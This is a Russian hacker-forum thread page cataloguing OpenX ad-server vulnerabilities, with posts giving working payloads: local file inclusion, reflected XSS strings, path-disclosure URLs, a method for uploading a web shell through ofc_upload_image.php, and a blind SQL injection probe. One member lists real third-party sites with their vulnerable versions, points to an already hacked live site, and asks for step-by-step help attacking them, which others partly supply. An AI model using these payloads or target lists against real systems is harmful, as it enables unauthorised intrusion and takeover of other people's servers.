HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 21.04.2010, 13:52
(Dm)
Reservists Of Antichat - Level 6
Регистрация: 08.04.2008
Сообщений: 286
С нами: 9521666

Репутация: 1695
По умолчанию

Цитата:
Сообщение от MaSTeR GэN  
http://securityreason.com/wlb_show/WLB-2010010098
кто нить что нибудь понимает ? лично я нет, где там иньекция ,сижу втупляю не могу не хрена понять и вообше какое это отношение к самому движку имеет то ? ((
не имеет никакого отношения.
__________________
Cервер cs 1.6
cs.antichat.net:27015
 
Ответить с цитированием

  #12  
Старый 24.04.2010, 09:13
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами: 9154406

Репутация: 2221


По умолчанию

OpenX 2.6.4
LFI
Need: Права админа
/openx/www/admin/stats.php?entity=../../../../../../shell&breakdown=Обязательно пустое.
// shell, у меня там просто в папке с OpenX лежит файл shell.php, там <?PHP phpinfo(); ?> Код выполнился.
Если breakdown не вписать, то будет инклюдиться нечто вроде:
openx/lib/OA/Admin/Statistics/Delivery/Controller/../../../../../../shellAdvertiser.php

PHP код:
// Prepare the stats controller, and populate with the stats
$oStatsController = &OA_Admin_Statistics_Factory::getController($entity "-" $breakdown$aParams);
if (
PEAR::isError($oStatsController)) {
    
phpAds_Die('Error occured'$oStatsController->getMessage());
}
$oStatsController->start(); 
Ну вроде тот код, т.к. искал по началу в слепую.


Пассивная XSS:

openx/www/admin/stats.php?entity=campaign&breakdown=history&client id=1&campaignid=1'%22%3E%3Cscript%3Ealert();%3C/script%3E

Последний раз редактировалось Ctacok; 24.04.2010 в 09:21..
 
Ответить с цитированием

  #13  
Старый 11.05.2010, 21:01
gabarea
Новичок
Регистрация: 30.03.2010
Сообщений: 2
С нами: 8482939

Репутация: 0
По умолчанию

http://downloads.securityfocus.com/vulnerabilities/exploits/37110.rb

Цитата:
Сообщение от (Dm)  
ну а что не прокомментировал сплоит !1111
Загрузка php файлов, для авторизованных пользователей.
Версия <= 2.8.2

Последний раз редактировалось Ctacok; 15.06.2010 в 07:35..
 
Ответить с цитированием

  #14  
Старый 09.09.2010, 09:40
gabarea
Новичок
Регистрация: 30.03.2010
Сообщений: 2
С нами: 8482939

Репутация: 0
По умолчанию

нет новой уязвимости в системе OpenX? Меня интересует больше 2.8.1 и 2.8.2. Я не понимаю, как загрузить оболочку, используя btn_openads = 1 и btn_syscheck = 1.

Я здесь еще сайты ..

adserv.eightyfourmedia.com/www/admin/index.php - 2.8.2

openx.rsv05-jugend.de/www/admin/index.php - 2.8.2

ads.apj.dk/www/admin/index.php- 2.8.1

www.mobilescandinavia.dk/openads/www/admin/index.php - 2.8.5

banner.danske-it-eksperter.dk/www/admin/index.php - 2.8.4

openx.findpriser.dk/admin/index.php - 2.8.1

ads.gld.dk/www/admin/index.php - 2.8.5

ads2.dk-kogebogen.dk/www/admin/index.php - 2.8.5

jjokker Вы можете написать здесь шаг за шагом? спасибо
 
Ответить с цитированием

  #15  
Старый 12.09.2010, 18:49
Strilo4ka
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
С нами: 9000386

Репутация: 1148
По умолчанию

Уязвимости openX

openX 2.8.6

Path disclosure

http://localhost/openx-2.8.6/www/admin/plugins/openXWorkflow/application/bootstrap.php

Path disclosure

display_errors = On

Код:
http://localhost/openx-2.8.6/www/admin/plugins/videoReport/stats-debug.php
http://localhost/openx-2.8.6/www/admin/plugins/videoReport/stats-api.php
http://localhost/openx-2.8.6/www/admin/plugins/videoReport/stats-export-csv.php
http://localhost/openx-2.8.6/www/admin/plugins/videoReport/navigation/oxVastMenuChecker.php
http://localhost/openx-2.8.6/www/admin/plugins/videoReport/lib/ofc2/ofc_area_base.php
http://localhost/openx-2.8.6/www/admin/plugins/videoReport/lib/ofc2/ofc_area_hollow.php
http://localhost/openx-2.8.6/www/admin/plugins/videoReport/lib/ofc2/ofc_area_line.php
http://localhost/openx-2.8.6/www/admin/plugins/videoReport/lib/ofc2/ofc_bar_filled.php
http://localhost/openx-2.8.6/www/admin/plugins/videoReport/lib/ofc2/ofc_line_dot.php
http://localhost/openx-2.8.6/www/admin/plugins/videoReport/lib/ofc2/ofc_line_hollow.php
http://localhost/openx-2.8.6/www/admin/plugins/videoReport/lib/ofc2/ofc_sugar.php
http://localhost/openx-2.8.6/www/admin/plugins/videoReport/lib/ofc2/ofc_y_axis.php
http://localhost/openx-2.8.6/www/admin/plugins/videoReport/lib/ofc2/ofc_y_axis_right.php
http://localhost/openx-2.8.6/www/admin/plugins/videoReport/lib/SmartyFunctions/function.url.php
http://localhost/openx-2.8.6/www/admin/plugins/videoReport/lib/SmartyFunctions/modifier.formatNumber.php
http://localhost/openx-2.8.6/www/admin/plugins/videoReport/lib/Graph/Flash/AreaGraph.php
http://localhost/openx-2.8.6/www/admin/plugins/videoReport/lib/Graph/Flash/BaseGraph.php
http://localhost/openx-2.8.6/www/admin/plugins/videoReport/lib/Graph/Flash/LineGraph.php
http://localhost/openx-2.8.6/www/admin/plugins/oxMarket/oxMarket.class.php
http://localhost/openx-2.8.6/www/admin/plugins/oxMarket/navigation/oxMarketActiveChecker.php
http://localhost/openx-2.8.6/www/admin/plugins/oxMarket/navigation/oxMarketAdminStatsChecker.php
http://localhost/openx-2.8.6/www/admin/plugins/oxMarket/navigation/oxMarketEntityChecker.php
http://localhost/openx-2.8.6/www/admin/plugins/oxMarket/navigation/oxMarketMultipleAccountsModeChecker.php
http://localhost/openx-2.8.6/www/admin/plugins/oxMarket/navigation/oxMarketStandaloneModeChecker.php
http://localhost/openx-2.8.6/www/admin/plugins/oxMarket/library/OX/oxMarket/Common/Cache.php
http://localhost/openx-2.8.6/www/admin/plugins/oxMarket/library/OX/oxMarket/Common/ConnectionUtils.php
http://localhost/openx-2.8.6/www/admin/plugins/oxMarket/library/OX/oxMarket/Dal/Advertiser.php
http://localhost/openx-2.8.6/www/admin/plugins/oxMarket/library/OX/oxMarket/Dal/Campaign.php
http://localhost/openx-2.8.6/www/admin/plugins/oxMarket/library/OX/oxMarket/M2M/PearXmlRpcCustomClientExecutor.php
http://localhost/openx-2.8.6/www/admin/plugins/oxMarket/library/OX/oxMarket/M2M/ZendXmlRpcCustomClientExecutor.php
http://localhost/openx-2.8.6/www/admin/plugins/oxMarket/library/OX/oxMarket/UI/CampaignForm.php
http://localhost/openx-2.8.6/www/admin/plugins/oxMarket/library/OX/oxMarket/UI/CampaignsSettings.php
http://localhost/openx-2.8.6/www/admin/plugins/oxMarket/library/OX/oxMarket/UI/EntityFormManager.php
http://localhost/openx-2.8.6/www/admin/plugins/oxMarket/library/OX/oxMarket/UI/EntityHelper.php
http://localhost/openx-2.8.6/www/admin/plugins/oxMarket/library/OX/oxMarket/UI/EntityScreenManager.php
http://localhost/openx-2.8.6/www/admin/plugins/oxMarket/library/OX/oxMarket/UI/rule/FloorPriceCompare.php
http://localhost/openx-2.8.6/www/admin/plugins/oxMarket/library/OX/oxMarket/UI/rule/QuickFormFloorPriceCompareRuleAdaptor.php
...
раскрытий много.
Path disclosure

display_errors = On

Код:
http://localhost/openx-2.8.6/www/admin/plugins/videoReport/lib/ofc2/ofc_upload_image.php
барыжная XSS

Код:
http://localhost/openx-2.8.6/www/admin/plugins/videoReport/lib/ofc2/ofc_upload_image.php?name=%3Cimg%20alt=%22%ED%E0%E6%EC%E8%22%20onmouseover=%22javascript:alert%28123%29%22%20%3E
ofc_upload_image.php

PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#FF8000"]/*...*/

// full path to the saved image including filename //

[/COLOR][COLOR="#0000BB"]$destination[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$default_path[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]basename[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'name'[/COLOR][COLOR="#007700"]] );

echo[/
COLOR][COLOR="#DD0000"]'Saving your image to: '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$destination[/COLOR][COLOR="#007700"];

[/
COLOR][COLOR="#FF8000"]/*...*/[/COLOR][/COLOR
Записываем шелл

ofc_upload_image.php

rg on

PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#FF8000"]/*...*/

// default path for the image to be stored //

[/COLOR][COLOR="#0000BB"]$default_path[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'../tmp-upload-images/'[/COLOR][COLOR="#007700"];

if (![/COLOR][COLOR="#0000BB"]file_exists[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$default_path[/COLOR][COLOR="#007700"]))[/COLOR][COLOR="#0000BB"]mkdir[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$default_path[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0777[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"]);

[/
COLOR][COLOR="#FF8000"]// full path to the saved image including filename //

[/COLOR][COLOR="#0000BB"]$destination[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$default_path[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]basename[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'name'[/COLOR][COLOR="#007700"]] );

echo[/
COLOR][COLOR="#DD0000"]'Saving your image to: '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$destination[/COLOR][COLOR="#007700"];

[/
COLOR][COLOR="#FF8000"]// print_r( $_POST );

// print_r( $_SERVER );

// echo $HTTP_RAW_POST_DATA;

//

// POST data is usually string data, but we are passing a RAW .png

// so PHP is a bit confused and $_POST is empty. But it has saved

// the raw bits into $HTTP_RAW_POST_DATA

//

[/COLOR][COLOR="#0000BB"]$jfh[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]fopen[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$destination[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'w'[/COLOR][COLOR="#007700"]) or die([/COLOR][COLOR="#DD0000"]"can't open file"[/COLOR][COLOR="#007700"]);

[/
COLOR][COLOR="#0000BB"]fwrite[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$jfh[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$HTTP_RAW_POST_DATA[/COLOR][COLOR="#007700"]);

[/
COLOR][COLOR="#0000BB"]fclose[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$jfh[/COLOR][COLOR="#007700"]);

[/
COLOR][COLOR="#FF8000"]//

// LOOK:

//

[/COLOR][COLOR="#007700"]exit();

[/
COLOR][COLOR="#FF8000"]/*...*/[/COLOR][/COLOR
Если б небыло дальше exit(), то можно было лить шелл бес зависимости.

Код HTML:

будет текст:

Цитата:
Сообщение от None  
Saving your image to: ../tmp-upload-images/wso.php
Шелл будет тут:

Код:
http://localhost/openx-2.8.6/www/admin/plugins/videoReport/lib/tmp-upload-images/wso.php
localhost/openx-2.8.6 змаенить на [host]/[path]

скоро буду дальше смотреть(времени мало) ...

Решил почитать о $HTTP_RAW_POST_DATA

Оказуетцо, если register_globals off, то все же писать данные в файл возможно.

Только данные урл-кодируютцо, если не урл-кодированные, то мы имеем шелл.

Как послать данные не урл-кодированные думаю все вы знаете.

В $HTTP_RAW_POST_DATA заганяютцо пост-даные напрямую.

в php.ini должно быть

Цитата:
Сообщение от None  
; Always populate the $HTTP_RAW_POST_DATA variable.
always_populate_raw_post_data = On
файл 1.php:

Код:

обращаемся:

Код:
http://localhost/1.php
результат:

data=12345

експлоит:

Код:

Цитата:
Сообщение от None  
Host=localhost
User-Agent=Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding=gzip,deflate
Accept-Charset=windows-1251,utf-8;q=0.7,*;q=0.7
Keep-Alive=115
Connection=keep-alive
Referer=http://localhost/1.html
Cookie=vc=26; OAID=f3376b72128277e77c859bc6ca859fc7
Content-Type=application/x-www-form-urlencoded
Content-Length=21
POSTDATA=Name=
Наш шелл в даном случае тут:

Код:
http://localhost/openx-2.8.6/www/admin/plugins/videoReport/lib/ofc2/ofc_upload_image.php?name=222.php
заменяем localhost/openx-2.8.6 на [host]/[path]

Хе-хе, самое интересное, когда пихать с атрибутом enctype, то нет никакого результата.

Код:

зы

PHP Version 5.2.14, нужная директива была закоментирована
 
Ответить с цитированием

  #16  
Старый 19.10.2010, 23:04
gabarea
Новичок
Регистрация: 30.03.2010
Сообщений: 2
С нами: 8482939

Репутация: 0
По умолчанию

Для OpenX 2.8.1 эксп находится по адресу install-plugin.php?status=1&plugin=openXMarket

Почему на конкретном примере по адресу http://www.freegolfschool.com/oa/www/admin/install-plugin.php?status=1&plugin=openXMarket он не работает?

Для версии OpenX 2.8.4 эксп для видео плагина расположен в ofc_upload_image.php.

Я нашел похаканый сайт http://www.knockknockrecords.com/openx/www/admin/plugins/videoReport/lib/tmp-upload-images/, где x.php и cloud.php уже кемто загружены.

Я пробую заюзать http://www.knockknockrecords.com/openx/www/admin/plugins/videoReport/lib/ofc2/ofc_upload_image.php?name=1.php&HTTP_RAW_POST_DATA = ,

но 1.php пуст. Почему?
 
Ответить с цитированием

  #17  
Старый 20.10.2010, 14:08
Strilo4ka
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
С нами: 9000386

Репутация: 1148
По умолчанию

pXSS

/plugins/deliveryLimitations/Client/lib/phpSniff/index.php

PHP код:
[COLOR="#000000"]/*...*/

require_once('phpSniff.class.php');

require_once(
'phpTimer.class.php');

/*...*/

$sniffer_settings = array('check_cookies'=>$GET_VARS['cc'],

'default_language'=>$GET_VARS['dl'],

'allow_masquerading'=>$GET_VARS['am']);

$client =& new phpSniff($GET_VARS['UA'],$sniffer_settings);

/*...*/

[/COLOR]">ua

[/COLOR]"
>[COLOR="#0000BB"][/COLOR][COLOR="#0000BB"]get_property[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'ua'[/COLOR][COLOR="#007700"]);[/COLOR][COLOR="#0000BB"]?>[/COLOR]

/*...*/[/COLOR] 
/plugins/deliveryLimitations/Client/lib/phpSniff/phpSniff.class.php

PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#FF8000"]/*...*/

[/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]phpSniff[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$UA[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$settings[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"])

{

[/
COLOR][COLOR="#FF8000"]/*..*/

[/COLOR][COLOR="#007700"]if(empty([/COLOR][COLOR="#0000BB"]$UA[/COLOR][COLOR="#007700"])) return[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"];



[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]_set_browser[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'ua'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$UA[/COLOR][COLOR="#007700"]);

if([/COLOR][COLOR="#0000BB"]$run[/COLOR][COLOR="#007700"])[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]init[/COLOR][COLOR="#007700"]();

[/
COLOR][COLOR="#FF8000"]/*...*/

[/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]property[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$p[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]null[/COLOR][COLOR="#007700"])

{ if([/COLOR][COLOR="#0000BB"]$p[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#0000BB"]null[/COLOR][COLOR="#007700"])

{ return[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]_browser_info[/COLOR][COLOR="#007700"];

}

else

{ return[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]_browser_info[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]strtolower[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$p[/COLOR][COLOR="#007700"])];

}

}

[/
COLOR][COLOR="#FF8000"]/*...*/

[/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]_set_browser[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$k[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$v[/COLOR][COLOR="#007700"])

{[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]_browser_info[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]strtolower[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$k[/COLOR][COLOR="#007700"])] =[/COLOR][COLOR="#0000BB"]strtolower[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$v[/COLOR][COLOR="#007700"]);

}

[/
COLOR][COLOR="#FF8000"]/*...*/

[/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]get_property[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$p[/COLOR][COLOR="#007700"])

{ return[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]property[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$p[/COLOR][COLOR="#007700"]);

}

[/
COLOR][COLOR="#FF8000"]/*...*/[/COLOR][/COLOR
Код:
PoC
http://[host]/[path]/plugins/deliveryLimitations/Client/lib/phpSniff/index.php?UA=%3Cscript%3Ealert%28123%29%3C/script%3E
Проверил на OpenX 2.8.1, 2.8.2, 2.8.3, 2.8.4, 2.8.6, 2.8.7.

Path disclosure

условия -> никаких

на данный момент на последней ветке 2.8.7 что нашел --> работает

Код:
PoC http://[host]/[path]/www/admin/plugins/openXWorkflow/application/bootstrap.php
 
Ответить с цитированием

  #18  
Старый 20.10.2010, 14:11
Strilo4ka
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
С нами: 9000386

Репутация: 1148
По умолчанию

gabarea,

1.

Цитата:
Сообщение от None  
Для OpenX 2.8.1 эксп находится по адресу install-plugin.php?status=1&plugin=openXMarket
Почему на конкретном примере по адресу http://www.freegolfschool.com/oa/www/admin/install-plugin.php?status=1&plugin=openXMarket он не работает?
http://openx-2.8.1/www/admin/install-plugin.php?status=1&plugin=openXMarket

Там path disclosure не смотря код. Надо посмотреть код.

2.

Цитата:
Сообщение от None  
Я нашел похаканый сайт http://www.knockknockrecords.com/openx/www/admin/plugins/videoReport/lib/tmp-upload-images/, где x.php и cloud.php уже кемто загружены. Я пробую заюзать http://www.knockknockrecords.com/openx/www/admin/plugins/videoReport/lib/ofc2/ofc_upload_image.php?name=1.php&HTTP_RAW_POST_DATA = ,
но 1.php пуст. Почему?
Потому что для експулатации нет условий.

В даном случае:

Код:
register_globals Off
always_populate_raw_post_data Off.
Ну если возможно переопределить $HTTP_RAW_POST_DATA как то бес етих директив, то я буду не прав.
 
Ответить с цитированием

  #19  
Старый 16.12.2010, 22:34
durito
Познающий
Регистрация: 06.06.2008
Сообщений: 76
С нами: 9436363

Репутация: 55
По умолчанию

(Dm) ты забыл сказать что в phpAdsNew должна быть включена опция:

Опции HTML-баннеров =>Разрешить выполнение PHP-выражений из HTML-баннера

тогда код будет выполнятся, если опция неактивна, то в html-сырцах страницы мы увидим php-код

к сожалению я не так много видел сайтов, где эта опция активирована. а обычно на сайтах запирают файл config.inc.php и шел уже таким способом не залить
 
Ответить с цитированием

  #20  
Старый 19.07.2011, 12:02
darkhouse
Новичок
Регистрация: 30.07.2006
Сообщений: 3
С нами: 10411054

Репутация: 0
По умолчанию

Openads v2.3.35-beta

слепая скуля

http://target.com/ads/www/delivery/ac.php?bannerid=24 and 1=1

не знаю может и баян, но в ветке нету
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обзор уязвимостей CMS [Joomla,Mambo] и их компонентов it's my Веб-уязвимости 361 24.10.2019 10:25
[ Обзор уязвимостей RunCMS ] Solide Snake Веб-уязвимости 43 07.07.2012 02:09
[ Обзор уязвимостей PHP-Nuke ] [53x]Shadow Веб-уязвимости 43 04.02.2012 20:33
[ Обзор уязвимостей #osCommerce# ] life_is_shit Веб-уязвимости 9 10.11.2009 17:43
Обзор уязвимостей движка трекера TBSource. Arigona Веб-уязвимости 1 28.12.2008 14:42



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору. Комиссия форума: 2%.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...
×

ESCROW ADMIN PANEL

Загрузка...
Загрузка...